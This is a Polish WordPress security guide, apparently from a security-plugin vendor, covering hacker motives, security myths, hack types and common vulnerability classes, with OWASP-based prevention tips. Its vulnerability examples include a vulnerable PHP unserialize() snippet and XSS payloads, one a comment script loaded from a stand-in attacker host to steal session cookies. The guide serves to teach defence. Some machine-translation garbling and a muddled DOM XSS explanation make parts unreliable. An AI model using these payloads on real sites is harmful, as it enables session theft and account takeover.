Bezpieczeństwo WordPress: najlepszy przewodnik

Bezpieczeństwo WordPressa może być onieśmielające, ale nie musi tak być. W tym obszernym przewodniku po zabezpieczeniach WordPressa uprościliśmy podstawy zabezpieczania witryny WordPress, aby każda osoba nie posiadająca wiedzy technicznej mogła zrozumieć i chronić swoją witrynę przed atakami hakerów.

Ten przewodnik po bezpieczeństwie WordPressa jest podzielony na 10 łatwo przyswajalnych sekcji. Każda sekcja poprowadzi Cię przez konkretny aspekt bezpieczeństwa WordPress. Pod koniec przewodnika poznasz różne rodzaje luk w zabezpieczeniach, motywy hakerów oraz sposoby zabezpieczania wszystkiego, od serwera po poszczególnych użytkowników witryny WordPress.

Zanurzmy się!

Sekcja 1: Czy WordPress jest bezpieczny?

Czy WordPress jest bezpieczny? Krótka odpowiedź brzmi: tak.

Czy WordPress ma problemy z bezpieczeństwem?

Chociaż sam WordPress jest bezpieczny, unikanie błędów bezpieczeństwa WordPressa wymaga trochę wysiłku ze strony właścicieli witryn. Prawda jest taka, że ​​największym problemem bezpieczeństwa WordPressa są jego użytkownicy. Większości hacków WordPress na platformie można uniknąć przy niewielkim wysiłku ze strony właścicieli witryn.

Nie martw się, mamy Cię w zasięgu ręki. Ten przewodnik nauczy Cię wszystkiego, co musisz wiedzieć o ochronie Twojej witryny.

Zanim będziemy mogli zabezpieczyć nasze strony internetowe, musimy najpierw zrozumieć pięć rzeczy.

1. Dlaczego hakerzy atakują strony internetowe
2. Różne rodzaje hacków WordPress
3. Konkretne typy luk w WordPressie
4. Jak zapobiegać lukom w WordPressie
5. Jak określić wagę podatności?

Dlaczego haker miałby zaatakować moją witrynę?

To częste pytanie dotyczące bezpieczeństwa WordPressa, które możesz zadać, gdy zacznie się spełniać twój najgorszy koszmar. Dlaczego haker miałby zaatakować moją witrynę? Zapewniamy, że szanse na to, że atak będzie osobisty, są znikome. Hakerzy mają ukryte motywy, które nie mają nic wspólnego z zawartością Twojej witryny. Hakerzy zazwyczaj nie dbają o to, czy Twoja witryna jest stroną charytatywną dla bezdomnych szczeniąt, czy witryną z mnóstwem fajnych towarów na sprzedaż.

Trudno jednak nie czuć się celem, gdy anonimowa tożsamość włamała się do Twojej witryny, powodując chaos i zamieszanie. Czujesz się zestresowany i sytuacja wymyka się spod kontroli. Czujesz się osobiście zaatakowany i zastanawiasz się, czy istnieje sposób na powstrzymanie ataku. Możesz nawet się zastanawiać, czy nie udało się uratować wraku, który był twoją witryną.

Więc co sprawia, że ​​haker atakuje stronę internetową? Nie ma to nic wspólnego z Twoją witryną, tematami, które obejmuje ani nic w tym rodzaju. W rzeczywistości hakerzy atakują oprogramowanie, z którego korzysta Twoja witryna, aby działać bez zarzutu. Włamując się do tego oprogramowania, mogą ukraść poufne dane klientów, a nawet przejąć kontrolę nad Twoją witryną WordPress.

Niestety, wraz ze swoją rosnącą popularnością, WordPress stał się również celem hakerów. Jeśli popularna wtyczka WordPress ma poważną lukę, haker może potencjalnie przejąć setki tysięcy, jeśli nie miliony stron internetowych. Na szczęście większość luk w zabezpieczeniach wtyczek jest szybko łatana przez ich twórców.

Będąc w stanie zdobyć poufne i prywatne informacje, hakerzy mogą je następnie sprzedać za dochód lub nawet zatrzymać okup za dane, zasadniczo zmuszając ludzi do zapłaty za odzyskanie swoich informacji w bezpieczne ręce.

Jaka jest więc główna motywacja hakerów?

Aby stworzyć dla siebie przepływ gotówki.

Internet jest lukratywnym miejscem, które oferuje wszystkim sferom życia możliwość zarabiania na życie. Nie oznacza to jednak, że wszyscy podchodzą do tego w legalny, moralistyczny sposób. Hakerzy osiągają wysokie zyski nawet na najmniejszej stronie internetowej.

Pieniądze to jedyna motywacja, jakiej potrzebują, ale niektórzy cieszą się poczuciem władzy, jaką otrzymują, gdy uda im się włamać na stronę internetową, ale zdecydowana większość działa w biznesie wyłącznie dla gotówki.

Sekcja 2: Obalonych 5 najważniejszych mitów dotyczących bezpieczeństwa WordPress

Zanim przejdziemy do dalszej części tego przewodnika po bezpieczeństwie WordPressa, poświęćmy chwilę na obalenie niektórych mitów dotyczących bezpieczeństwa WordPressa.

W Internecie znajdziesz wiele porad dotyczących bezpieczeństwa WordPress od osób o dobrych intencjach, które naprawdę chcą pomóc. Niestety, niektóre z tych porad opierają się na mitach dotyczących bezpieczeństwa WordPress i tak naprawdę nie dodają żadnych dodatkowych zabezpieczeń do Twojej witryny WordPress. W rzeczywistości niektóre „wskazówki” dotyczące bezpieczeństwa WordPressa mogą zwiększać prawdopodobieństwo napotkania problemów i konfliktów.

Mamy do wyboru wiele mitów dotyczących bezpieczeństwa WordPressa, ale skupimy się tylko na 5 najlepszych, które konsekwentnie widzieliśmy w ponad 30 000 zgłoszeń do pomocy technicznej. Rozmowy z naszymi klientami posłużyły jako podstawa dla następujących kryteriów wyboru najważniejszych mitów dotyczących bezpieczeństwa WordPressa:

1. Częstotliwość, o której wspominano mit.
2. Liczba bólów głowy, które spowodował mit.
3. Fałszywe poczucie bezpieczeństwa, jakie daje mit.

1. Powinieneś ukryć swój adres URL /wp-admin lub /wp-login (znany również jako Hide Backend)

Ideą ukrywania wp-admina jest to, że hakerzy nie mogą zhakować tego, czego nie mogą znaleźć. Jeśli adres URL logowania nie jest standardowym adresem URL /wp-admin/ WordPress, czy nie jesteś chroniony przed atakami typu brute force?

Prawda jest taka, że ​​większość funkcji Hide Backend to po prostu zabezpieczenie przez ukrywanie, co nie jest kuloodporną strategią bezpieczeństwa WordPress. Chociaż ukrywanie adresu URL wp-admin zaplecza może pomóc w złagodzeniu niektórych ataków na logowanie, to podejście nie powstrzyma ich wszystkich.

Często otrzymujemy zgłoszenia do pomocy technicznej od osób, które są zakłopotane tym, w jaki sposób iThemes Security Pro zgłasza nieprawidłowe próby logowania, gdy ukryli swój login. Dzieje się tak, ponieważ istnieją inne sposoby logowania się do witryn WordPress poza przeglądarką, na przykład za pomocą XML-RPC lub REST API. Nie wspominając już o zmianie adresu URL logowania, inna wtyczka lub motyw może nadal prowadzić do nowego adresu URL.

W rzeczywistości funkcja Hide Backend tak naprawdę niczego nie zmienia. Tak, uniemożliwia to większości użytkowników bezpośredni dostęp do domyślnego adresu URL logowania. Ale gdy ktoś wprowadzi niestandardowy adres URL logowania, zostanie przekierowany z powrotem do domyślnego adresu URL logowania WordPress.

Wiadomo również, że dostosowywanie adresu URL logowania powoduje konflikty. Istnieje kilka wtyczek, motywów lub aplikacji innych firm, które na stałe kodują wp-login.php w swojej bazie kodu. Tak więc, gdy zakodowane oprogramowanie szuka twojej witryny.com/wp-login.php, zamiast tego znajduje błąd.

2. Powinieneś ukryć swoją nazwę motywu i numer wersji WordPress

Jeśli korzystasz z narzędzi programistycznych przeglądarki, możesz dość szybko zobaczyć nazwę motywu i numer wersji WordPressa działające w witrynie WordPress. Teoria ukrywania nazwy motywu i wersji WP polega na tym, że jeśli atakujący mają te informacje, będą mieli plan włamania się do Twojej witryny.

Na przykład, patrząc na powyższy zrzut ekranu, możesz zobaczyć, że ta strona korzysta z Twenty Twenty-One, a wersja WordPress to 5.6.

Problem z tym mitem o bezpieczeństwie WordPressa polega na tym, że za klawiaturą nie ma prawdziwego faceta, który szuka idealnej kombinacji motywu i numeru wersji WordPressa do ataku. Istnieją jednak bezmyślne boty, które przeszukują Internet w poszukiwaniu znanych luk w kodzie działającym w Twojej witrynie, więc ukrycie nazwy motywu i numeru wersji WP nie ochroni Cię.

3. Powinieneś zmienić nazwę katalogu wp-content

Katalog wp-content zawiera folder wtyczek, motywów i plików multimedialnych. To mnóstwo dobrych rzeczy i kodu wykonywalnego w jednym katalogu, więc zrozumiałe jest, że ludzie chcą być proaktywni i zabezpieczyć ten folder.

Niestety jest to mit bezpieczeństwa WordPress, że zmiana nazwy wp-content doda dodatkową warstwę bezpieczeństwa do witryny. Nie będzie. Możemy łatwo znaleźć nazwę zmienionego katalogu wp-content za pomocą narzędzi programistycznych przeglądarki. Na poniższym zrzucie ekranu widzimy, że zmieniłem nazwę katalogu zawartości tej witryny na /test/.

Zmiana nazwy katalogu nie doda żadnych zabezpieczeń do Twojej witryny, ale może spowodować konflikty w przypadku wtyczek, które mają zakodowaną na stałe ścieżkę katalogu /wp-content/.

4. Moja strona internetowa nie jest wystarczająco duża, aby zwrócić uwagę hakerów

Ten mit dotyczący bezpieczeństwa WordPress naraża wiele witryn na ataki. Nawet jeśli jesteś właścicielem małej witryny o niskim ruchu, nadal ważne jest, abyś aktywnie zabezpieczał swoją witrynę.

Nawet jeśli jesteś właścicielem małej witryny o niskim ruchu, nadal ważne jest, abyś aktywnie zabezpieczał swoją witrynę.

Prawda jest taka, że ​​Twoja witryna lub firma nie muszą być duże, aby przyciągnąć uwagę potencjalnego napastnika. Hakerzy wciąż widzą możliwość wykorzystania Twojej witryny jako kanału do przekierowywania niektórych odwiedzających na złośliwe witryny, wysyłania spamu z serwera pocztowego, rozprzestrzeniania wirusów, a nawet do wydobywania bitcoinów. Zabiorą wszystko, co mogą.

5. WordPress to niezabezpieczona platforma

Najbardziej szkodliwym mitem bezpieczeństwa WordPressa jest to, że sam WordPress jest niepewny. To po prostu nieprawda. WordPress to najpopularniejszy system zarządzania treścią na świecie i nie udało mu się osiągnąć tego, nie traktując poważnie bezpieczeństwa.

Sekcja 3: WordPress Hacki i luki w zabezpieczeniach WordPress

4 rodzaje hacków WordPress

Jeśli chodzi o zrozumienie bezpieczeństwa WordPress, ważne jest, aby zrozumieć

1. Spam SEO

Kolejną motywacją hakera do zaatakowania Twojej witryny jest czerpanie korzyści ze spamu SEO. SEO, czyli optymalizacja pod kątem wyszukiwarek, jest tym, czego wyszukiwarki używają do indeksowania lub oceniania Twojej witryny. Używając określonych słów kluczowych, umieszczonych strategicznie na Twoich stronach internetowych i w postach na blogu, możesz podnieść pozycję swojej witryny w wynikach wyszukiwania Google. Przyciągnie to ruch do Twojej witryny i pomoże Ci osiągnąć zysk, który jest wart Twojego czasu.

Hakerzy wiedzą wszystko o SEO i wykorzystują to na swoją korzyść. Gdy Twoja witryna zostanie naruszona, hakerzy zainstalują na niej backdoora. Dzięki temu mogą zdalnie kontrolować słowa kluczowe i zawartość witryny. Często przekierowują ruch z Twojej witryny, kierując go bezpośrednio do swojej witryny, całkowicie pomijając Twoją.

To sprawi, że Twoi docelowi odbiorcy będą zdezorientowani i sfrustrowani, niszcząc reputację i wiarygodność Twojej witryny. Odwiedzający Twoją witrynę często będą przekierowywani na strony, które są oczywiście oszustwami i będą niechętnie odwiedzali Twoją witrynę w przyszłości.

Jakby tego było mało, hakerzy stosujący to podejście sprawiają, że Twoja witryna wygląda źle dla wyszukiwarek, a nie tylko dla innych ludzi. Twoja strona internetowa przestanie wyglądać na legalną, a jej ranking szybko spadnie. Bez wysokiego rankingu w wyszukiwaniach Twoja witryna stanie się jedną z milionów, które nigdy nie uzyskują więcej niż kilka odsłon miesięcznie.

2. Wstrzyknięcia złośliwego oprogramowania

Wielu hakerów atakuje Twoją witrynę, zamierzając ją zainfekować złośliwym oprogramowaniem. Złośliwe oprogramowanie to małe fragmenty kodu, które można wykorzystać do wprowadzenia złośliwych zmian w witrynie. Jeśli Twoja witryna zostanie zainfekowana złośliwym oprogramowaniem, ważne jest, aby jak najszybciej otrzymać powiadomienie.

Z każdą minutą, gdy złośliwe oprogramowanie pozostaje w Twojej witrynie, powoduje więcej szkód w Twojej witrynie. Im więcej szkód zostanie wyrządzonych Twojej witrynie, tym dłużej zajmie Ci czyszczenie i przywracanie witryny. Niezbędne jest sprawdzanie kondycji witryny poprzez regularne skanowanie w poszukiwaniu złośliwego oprogramowania. Dlatego tak ważne jest ciągłe sprawdzanie kondycji Twojej witryny poprzez skanowanie w poszukiwaniu złośliwego oprogramowania.

3. Oprogramowanie ransomware

Haker może chcieć zaatakować Twoją witrynę, aby przechować ją dla okupu. Ransomware odnosi się do sytuacji, gdy haker przejmie Twoją witrynę, nie zwróci Ci jej, chyba że zapłacisz im wysoką opłatę. Średni czas przestoju ataku ransomware wynosi 9,5 dnia. Ile przychodu kosztowałoby Cię 10 dni bez sprzedaży?

Średni okup, którego żądają hakerzy, wzrósł dramatycznie z 294 USD w 2015 r. do ponad 13 000 USD w 2020 r. Przy tego rodzaju wypłatach działalność przestępczości internetowej nie zwalnia. W miarę rozwoju społeczności przestępczych, takich jak ta, coraz ważniejsze staje się właściwe zabezpieczenie i ochrona witryny.

4. Zniekształcenie strony internetowej

Niektórzy hakerzy mogą dla zabawy zaatakować Twoją witrynę. Styl hakowania, który jest z natury mniej zły, to styl łamania stron internetowych. Są to zazwyczaj dzieci lub młodzi dorośli, którzy dopiero zaczynają bawić się swoimi umiejętnościami hakerskimi. Robią takie hacki, aby ćwiczyć i doskonalić swoje umiejętności.

Kiedy mówimy o zniszczeniu strony internetowej, pomyśl o graffiti. Osoby atakujące całkowicie zmienią wygląd Twojej witryny, czasami w zabawny lub zwariowany sposób. Typowi defacerzy robią swoje czyny dla zabawy lub jako sposób na popis. Często publikują zdjęcia swoich występków, próbując do siebie nawzajem sięgnąć, aby wygrać nagrodę za najlepsze zniesławienie.

Dobrą wiadomością jest to, że ta forma hakowania jest dla ciebie mniej niebezpieczna. Ponadto, ponieważ to głównie nastolatki i inni hakerzy-amatorzy, którzy wprowadzają w błąd, łatwiej je wykryć i usunąć z witryny w porównaniu z innymi formami złośliwego oprogramowania. Zazwyczaj można je wykryć za pomocą skanerów i szybko usunąć.

Wyjaśniono 21 typowych luk w WordPressie

Niestety istnieją luki w WordPressie. Luki w WordPressie mogą istnieć w twoich wtyczkach, motywach, a nawet rdzeniu WordPress. A ponieważ WordPress obsługuje obecnie prawie 40% wszystkich stron internetowych, zadanie zrozumienia luk w zabezpieczeniach jest jeszcze ważniejsze. Mówiąc najprościej: musisz uważać na bezpieczeństwo swojej witryny.

Jeśli nie jesteś ekspertem ds. bezpieczeństwa WordPress, zrozumienie wszystkich różnych luk w zabezpieczeniach WordPressa może być zniechęcające. Próba zrozumienia różnych poziomów ważności luki oraz zagrożeń związanych z luką WordPress może być również przytłaczająca.

W tym przewodniku zdefiniujemy 21 najczęstszych luk w zabezpieczeniach WordPress, omówimy sposób oceny ważności luki w zabezpieczeniach WordPress, podamy przykłady sposobów wykorzystania luki przez hakera oraz pokażemy, jak można zapobiec tym lukom. Zanurzmy się.

Co to jest luka w zabezpieczeniach WordPressa?

Luka WordPress to słabość lub wada w motywie, wtyczce lub rdzeniu WordPress, którą może wykorzystać haker. Innymi słowy, luki w WordPressie tworzą punkt wejścia, który haker może wykorzystać do przeprowadzenia złośliwej aktywności.

Pamiętaj, że hakowanie stron internetowych jest prawie w całości zautomatyzowane. Z tego powodu hakerzy mogą łatwo włamać się do dużej liczby stron internetowych praktycznie w mgnieniu oka. Hakerzy używają specjalnych narzędzi, które skanują internet w poszukiwaniu znanych luk w zabezpieczeniach.

Hakerzy lubią łatwe cele, a posiadanie witryny, na której działa oprogramowanie ze znanymi lukami w zabezpieczeniach, jest jak przekazywanie hakerowi instrukcji krok po kroku, jak włamać się do witryny WordPress, serwera, komputera lub innego urządzenia podłączonego do Internetu.

Nasze comiesięczne raporty podsumowujące luki w zabezpieczeniach WordPress obejmują wszystkie publicznie ujawnione luki w rdzeniu WordPressa, wtyczce WordPress i motywach. W tych podsumowaniach udostępniamy nazwę wtyczki lub motywu, której dotyczy luka, wersje, których dotyczy luka, oraz typ luki.

Co to jest luka dnia zerowego?

Jeśli chodzi o bezpieczeństwo WordPress, ważne jest zrozumienie definicji luki zero-day. Ponieważ luka została ujawniona opinii publicznej, deweloper ma zero dni na załatanie luki. A to może mieć duże konsekwencje dla twoich wtyczek i motywów.

Zazwyczaj badacz bezpieczeństwa odkryje lukę w zabezpieczeniach i prywatnie ujawni ją deweloperom firmy, którzy są właścicielami oprogramowania. Badacz bezpieczeństwa i deweloper zgadzają się, że pełne szczegóły zostaną opublikowane po udostępnieniu łatki. Po wydaniu poprawki może wystąpić niewielkie opóźnienie w ujawnieniu luki w zabezpieczeniach, aby dać więcej osób czas na zaktualizowanie głównych luk w zabezpieczeniach.

Jeśli jednak programista nie odpowie badaczowi bezpieczeństwa lub nie dostarczy łaty dla luki, badacz może publicznie ujawnić lukę, aby wywrzeć nacisk na programistę, aby wydał łatę.

Publiczne ujawnienie luki w zabezpieczeniach i pozorne wprowadzenie dnia zerowego może wydawać się kontrproduktywne. Jest to jednak jedyna dźwignia, którą badacz musi wywrzeć na deweloperze, aby załatał tę lukę.

Google Project Zero ma podobne wytyczne, jeśli chodzi o ujawnianie luk w zabezpieczeniach. Po 90 dniach publikują pełne szczegóły luki. Czy usterka została załatana, czy nie.

Każdy może znaleźć lukę w zabezpieczeniach. Jeśli haker znajdzie lukę, zanim programista wyda łatkę, stanie się to najgorszym koszmarem użytkownika końcowego…. Aktywnie eksploatowany dzień zerowy.

Co to jest aktywnie wykorzystywana luka dnia zerowego?

Aktywnie wykorzystywana luka zero-day jest dokładnie tym, na co wygląda. Jest to niezałatana luka, którą hakerzy atakują, atakują i aktywnie wykorzystują.

Pod koniec 2018 r. hakerzy aktywnie wykorzystywali poważną lukę w zabezpieczeniach WordPress we wtyczce WP GDPR Compliance. Exploit umożliwiał nieautoryzowanym użytkownikom — więcej na ten temat w następnej sekcji — modyfikowanie ustawień rejestracji użytkownika WP i zmianę domyślnej roli nowego użytkownika z subskrybenta na administratora.

Ci hakerzy znaleźli tę lukę przed wtyczką WP GDPR Compliance i badaczami bezpieczeństwa. Tak więc każda strona internetowa, na której zainstalowano wtyczkę, była łatwym i gwarantowanym znakiem dla cyberprzestępców.

Jak uchronić się przed luką dnia zerowego

Najlepszym sposobem ochrony witryny przed luką Zero-Day jest dezaktywacja i usunięcie oprogramowania do czasu usunięcia luki. Na szczęście twórcy wtyczek WP GDPR Compliance działali szybko i opublikowali łatkę na lukę dzień po jej publicznym ujawnieniu.

Niezałatane luki w zabezpieczeniach sprawiają, że Twoja witryna jest łatwym celem dla hakerów.

Nieuwierzytelnione a uwierzytelnione luki w WordPressie

Istnieją jeszcze dwa terminy, z którymi musisz się zapoznać, mówiąc o lukach w WordPressie.

1. Nieuwierzytelnione — nieuwierzytelniona luka w zabezpieczeniach WordPressa oznacza, że ​​każdy może ją wykorzystać.
2. Uwierzytelniony — Uwierzytelniona luka w zabezpieczeniach WordPressa oznacza, że ​​do jej wykorzystania potrzebny jest zalogowany użytkownik.

Hakerowi znacznie trudniej jest wykorzystać lukę, która wymaga uwierzytelnionego użytkownika, zwłaszcza jeśli wymaga uprawnień na poziomie administratora. A jeśli haker ma już w ręku zestaw danych uwierzytelniających administratora, naprawdę nie musi wykorzystywać luki w zabezpieczeniach, aby siać spustoszenie.

Jest jedno zastrzeżenie. Niektóre uwierzytelnione luki w zabezpieczeniach wymagają do wykorzystania jedynie możliwości na poziomie subskrybenta. Jeśli Twoja witryna pozwala każdemu się zarejestrować, tak naprawdę nie ma dużej różnicy między tą a nieuwierzytelnioną luką w zabezpieczeniach.

Jeśli chodzi o luki w WordPressie, istnieje 21 powszechnych typów luk. Omówmy każdy z tych typów luk w zabezpieczeniach WordPressa.

1. Ominięcie uwierzytelniania

Luka w zabezpieczeniach uwierzytelniania pozwala atakującemu pominąć wymagania dotyczące uwierzytelniania i wykonać zadania normalnie zarezerwowane dla uwierzytelnionych użytkowników.

Uwierzytelnianie to proces weryfikacji tożsamości użytkownika. WordPress wymaga od użytkowników wprowadzenia nazwy użytkownika i hasła w celu zweryfikowania ich tożsamości.

Przykład obejścia uwierzytelniania

Aplikacje weryfikują uwierzytelnianie na podstawie ustalonego zestawu parametrów. Osoba atakująca może zmodyfikować te parametry, aby uzyskać dostęp do stron internetowych, które zazwyczaj wymagają uwierzytelnienia.

Bardzo prostym przykładem czegoś takiego jest parametr uwierzytelniania w adresie URL.

 https:/my-website/some-plugint?param=authenticated&param=no

Powyższy adres URL zawiera parametr uwierzytelniania o wartości no. Więc kiedy odwiedzamy tę stronę, zostanie nam wyświetlony komunikat informujący nas, że nie jesteśmy upoważnieni do przeglądania informacji na tej stronie.

Jeśli jednak kontrola uwierzytelniania była źle zakodowana, osoba atakująca może zmodyfikować parametr uwierzytelniania, aby uzyskać dostęp do strony prywatnej.

 https:/my-website/some-plugint?param=authenticated&param=yes

W tym przykładzie haker może zmienić wartość uwierzytelniania w adresie URL na tak, aby ominąć wymóg uwierzytelniania w celu wyświetlenia strony.

Jak zapobiegać blokowaniu uwierzytelniania?

Możesz pomóc chronić swoją witrynę przed lukami w zabezpieczeniach uszkodzonego uwierzytelniania, korzystając z uwierzytelniania dwuskładnikowego.

2. Luka w zabezpieczeniach backdoora

Luka Backdoor pozwala zarówno autoryzowanym, jak i nieautoryzowanym użytkownikom ominąć normalne środki bezpieczeństwa WordPress i uzyskać dostęp wysokiego poziomu do komputera, serwera, strony internetowej lub aplikacji.

Przykład backdoora

Deweloper tworzy backdoora, aby mógł szybko przełączać się między kodowaniem a testowaniem kodu jako administrator. Niestety, deweloper zapomina usunąć backdoora przed udostępnieniem oprogramowania publicznie.

Jeśli haker znajdzie tylne drzwi, może wykorzystać punkt wejścia, aby uzyskać dostęp administracyjny do oprogramowania. Teraz, gdy haker ma dostęp administracyjny, może robić wszelkiego rodzaju złośliwe rzeczy, takie jak wstrzykiwanie złośliwego oprogramowania lub kradzież poufnych danych.

Jak zapobiec backdoorowi?

Wiele backdoorów można sprowadzić do jednego problemu — błędnej konfiguracji zabezpieczeń. Problemy związane z błędną konfiguracją zabezpieczeń WordPress można złagodzić, usuwając wszelkie nieużywane funkcje w kodzie, aktualizując wszystkie biblioteki i uogólniając komunikaty o błędach.

3. Luka dotycząca wstrzykiwania obiektów w PHP

Luka w zabezpieczeniach PHP Object-Injection występuje, gdy użytkownik przesyła dane wejściowe, które nie są oczyszczone (co oznacza, że ​​niedozwolone znaki nie są usuwane) przed przekazaniem do funkcji PHP unserialized() .

Przykład wstrzykiwania obiektów w PHP

Oto rzeczywisty przykład luki w zabezpieczeniach PHP Object-Injection we wtyczce Sample Ads Manager WordPress, która została pierwotnie zgłoszona przez sumofpwn.

Problem wynika z dwóch niebezpiecznych wywołań funkcji unserialize() w pliku wtyczek sam-ajax-loader.php . Dane wejściowe są pobierane bezpośrednio z żądania POST, jak widać w poniższym kodzie.

 if ( in_array( $action, $allowed_actions ) ) { switch ( $action ) { case 'sam_ajax_load_place': echo json_encode( array( 'success' => false, 'error' => 'Deprecated...' ) ); break; case 'sam_ajax_load_ads': if ( ( isset( $_POST['ads'] ) && is_array( $_POST['ads'] ) ) && isset( $_POST['wc'] ) ) { $clauses = **unserialize( base64_decode( $_POST['wc'] ) )**;

Ten problem może spowodować, że osoba atakująca wprowadzi i wykona złośliwy kod.

Jak zapobiegać wstrzykiwaniu obiektów PHP?

Nie używaj funkcji unserialize() z danymi wejściowymi unserialize() przez użytkownika, zamiast tego użyj funkcji JSON.

4. Luka w zabezpieczeniach cross-site Scripting

Luka XSS lub Cross-Site Scripting występuje, gdy aplikacja internetowa umożliwia użytkownikom dodawanie niestandardowego kodu w ścieżce adresu URL. Atakujący może wykorzystać tę lukę, aby uruchomić złośliwy kod w przeglądarce ofiary, utworzyć przekierowanie do złośliwej witryny lub przejąć sesję użytkownika.

Istnieją trzy główne typy XSS, odzwierciedlone. przechowywane i oparte na DOM

5. Odzwierciedlenie podatności na ataki Cross-Site Scripting

Reflected XSS lub Reflected Cross-Site Scripting występuje, gdy złośliwy skrypt jest wysyłany w żądaniu klienta — żądaniu wykonanym przez użytkownika w przeglądarce — do serwera i jest odzwierciedlany z powrotem przez serwer i wykonywany przez przeglądarkę.

Odzwierciedlany przykład Cross-Site Scripting

Załóżmy, że yourfavesite.com wymaga zalogowania się, aby wyświetlić część zawartości witryny. I załóżmy, że ta witryna nie koduje poprawnie danych wejściowych użytkownika.

Osoba atakująca może wykorzystać tę lukę, tworząc złośliwy link i udostępniając go użytkownikom yourfavesite.com w wiadomościach e-mail i postach w mediach społecznościowych.

Atakujący używa narzędzia do skracania adresów URL, aby złośliwy link wyglądał na niegroźny i yourfavesite.com/cool-stuff , yourfavesite.com/cool-stuff . Ale kiedy klikniesz skrócony link, przeglądarka uruchomi pełny link yourfavesite.com/cool-stuff?q=cool-stuff<\script&src=”http://bad-guys.com/passwordstealingcode.js .

Po kliknięciu linku zostaniesz przeniesiony na yourfavesite.com , a złośliwy skrypt zostanie odzwierciedlony z powrotem w Twojej przeglądarce, umożliwiając atakującemu przejęcie plików cookie sesji i konta yourfavesite.com .

Jak zapobiegać odbitym skryptom między witrynami

Reguła nr 5 w arkuszu OWASP zapobiegająca wykorzystywaniu skryptów krzyżowych polega na zakodowaniu adresu URL przed wstawieniem niezaufanych danych do wartości parametrów adresu URL HTML. Ta reguła może pomóc w zapobieganiu tworzeniu odbitej luki XSS podczas dodawania niezaufanych danych do wartości parametru HTTP GET.

<a href="http://www.yourfavesite.com?test=...ENCODE UNTRUSTED DATA BEFORE PUTTING HERE...">link</a >

6. Przechowywana luka w zabezpieczeniach cross-site Scripting

Podatność Stored XSS lub Stored Cross-Site Scripting umożliwia hakerom wstrzyknięcie złośliwego kodu i przechowywanie go na serwerze aplikacji internetowej.

Przykład przechowywanych skryptów między witrynami

Osoba atakująca odkrywa, że yourfavesite.com umożliwia odwiedzającym osadzanie tagów HTML w sekcji komentarzy witryny. Atakujący tworzy więc nowy komentarz:

Świetny artykuł! Zapoznaj się z innym powiązanym, świetnym artykułem <script src=”http://bad-guys.com/passwordstealingcode.js> . </script>

Uwaga: odbita luka XSS wymagałaby od odwiedzającego kliknięcia łącza do złośliwego kodu w celu wykonania. Przechowywany atak XSS wymaga tylko odwiedzenia strony zawierającej komentarz. Złośliwy kod uruchamia się przy każdym załadowaniu strony.

Teraz, gdy nasz zły facet dodał komentarz, każdy przyszły odwiedzający tę stronę będzie narażony na ich złośliwy skrypt. Skrypt jest hostowany na stronie internetowej yourfavesite.com i może przejąć kontrolę nad sesyjnymi plikami cookie odwiedzających oraz kontami na yourfavesite.com .

Jak zapobiegać przechowywanym skryptom między witrynami

Zasada nr 1 w arkuszu OWASP zapobiegająca wykorzystywaniu skryptów krzyżowych to kodowanie HTML przed dodaniem niezaufanych danych do elementów HTML.

 <body> ...ENCODE UNTRUSTED DATA BEFORE PUTTING HERE... </body>

 <div> ...ENCODE UNTRUSTED DATA BEFORE PUTTING HERE... </div>

Kodowanie następujących znaków, aby zapobiec przełączaniu się do dowolnego kontekstu wykonania, takiego jak skrypt, styl lub obsługa zdarzeń. W specyfikacji zaleca się używanie jednostek szesnastkowych.

 & --> &amp; < --> &lt; > --> &gt; " --> &quot; ' --> &#x27;

7. Luka w zabezpieczeniach umożliwiająca wykonywanie skryptów między witrynami w oparciu o model obiektowy dokumentu

Luka w zabezpieczeniach XSS oparta na modelu DOM lub skrypcie krzyżowym opartym na modelu obiektu dokumentu występuje, gdy skrypt po stronie klienta witryny zapisuje dane dostarczone przez użytkownika w modelu DOM (Document Object Model). Strona internetowa odczytuje następnie datę użytkownika z DOM i wyświetla ją w przeglądarce internetowej odwiedzającego.

Jeśli dane dostarczone przez użytkownika nie są odpowiednio obsługiwane, osoba atakująca może wstrzyknąć złośliwy kod, który zostanie wykonany, gdy witryna odczyta kod z DOM.

Uwaga: Odbity i przechowywany XSS to problemy po stronie serwera, podczas gdy XSS oparty na modelu DOM to problem klienta (przeglądarki).

Przykład skryptów między witrynami w oparciu o model obiektowy dokumentu

Typowy sposób wyjaśnienia ataku DOM XSS na niestandardową stronę powitalną. Po utworzeniu konta załóżmy, że yourfavesite.com zostaniesz przekierowany na stronę powitalną dostosowaną do powitania po imieniu przy użyciu poniższego kodu. A nazwa użytkownika jest zakodowana w adresie URL.

 <HTML> <TITLE>Welcome!</TITLE> Hi <SCRIPT> var pos=document.URL.indexOf("name=")+8; document.write(document.URL.substring(pos,document.URL.length)); </SCRIPT> <BR> Welcome to yourfavesite.com! … </HTML>

W ten sposób otrzymamy adres URL yourfavesite.com/account?name=yourname .

Osoba atakująca może przeprowadzić atak XSS oparty na modelu DOM, wysyłając następujący adres URL do nowego użytkownika:

 http://yourfavesite.com/account?name=<script>alert(document.cookie)</script>

Gdy nowy użytkownik kliknie link, jego przeglądarka wysyła żądanie o:

 /account?name=<script>alert(document.cookie)</script>

do bad-guys.com . Witryna odpowiada stroną zawierającą powyższy kod Javascript.

Przeglądarka nowego użytkownika tworzy dla strony obiekt DOM, w którym obiekt document.location zawiera ciąg:

 http://www.bad-guys.com/account?name=<script>alert(document.cookie)</script>

Oryginalny kod na stronie nie oczekuje, że domyślny parametr będzie zawierał znaczniki HTML, co spowoduje wyświetlenie znacznika na stronie. Następnie przeglądarka nowego użytkownika wyrenderuje stronę i wykona skrypt atakującego:

 alert(document.cookie)

Jak zapobiegać skryptom krzyżowym opartym na DOM

Reguła nr 1 w OWASP Dom-based, w której zastosowano cheat sheet zapobiegająca atakom cross-site scripting, to ucieczka HTML. Następnie kod JS zostaje zmieniony przed dodaniem niezaufanych danych do podkontekstu HTML w kontekście wykonania.

Przykładowe niebezpieczne metody HTML:

Atrybuty

 element.innerHTML = "<HTML> Tags and markup"; element.outerHTML = "<HTML> Tags and markup";

Metody

 document.write("<HTML> Tags and markup"); document.writeln("<HTML> Tags and markup");

Aby dokonać dynamicznych aktualizacji HTML w sejfie DOM, OWASP zaleca:

1. kodowanie HTML, a następnie
2. JavaScript koduje wszystkie niezaufane dane wejściowe, jak pokazano w poniższych przykładach:

 element.innerHTML = "<%=Encoder.encodeForJS(Encoder.encodeForHTML(untrustedData))%>"; element.outerHTML = "<%=Encoder.encodeForJS(Encoder.encodeForHTML(untrustedData))%>";

